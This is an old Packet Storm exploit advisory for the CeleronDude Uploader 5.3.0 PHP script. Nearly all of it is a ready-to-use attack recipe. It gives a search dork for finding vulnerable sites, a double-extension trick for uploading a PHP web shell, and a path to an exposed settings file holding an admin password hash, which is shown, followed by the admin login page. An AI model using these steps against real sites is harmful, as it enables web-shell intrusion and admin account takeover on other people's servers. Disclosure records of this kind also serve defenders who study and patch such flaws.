CeleronDude version 5.3.0 suffers from shell upload and password retrieval vulnerabilities.
f11cfbe20685057879af5f5a14d68390d14094ad0d083c9b3885a8486684f3a7
#############################
Uploader by CeleronDude 5.3.0 - Upload Vulnerability
Discovered by : Stink'
Date : 2009-12-17 for upload. 2010-01-17 for Settings.db retrieve password.
Dork : "Uploader by CeleronDude."
Website Publisher : <a href="http://www.celerondude.com/php-uploader-v5">http://www.celerondude.com/php-uploader-v5</a>
#############################
-- [Upload Vulnerability] --
Rename your shell.php in shell.php.pjpeg and Upload !
-- [Retrieve Password] --
Go to : http://site.com/[path]/data/settings.db
"admin_password";s:32:"468f7b0aaba9a806a0ce5bc4d4482164"
and go http://site.com/[path]/admin.php :)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed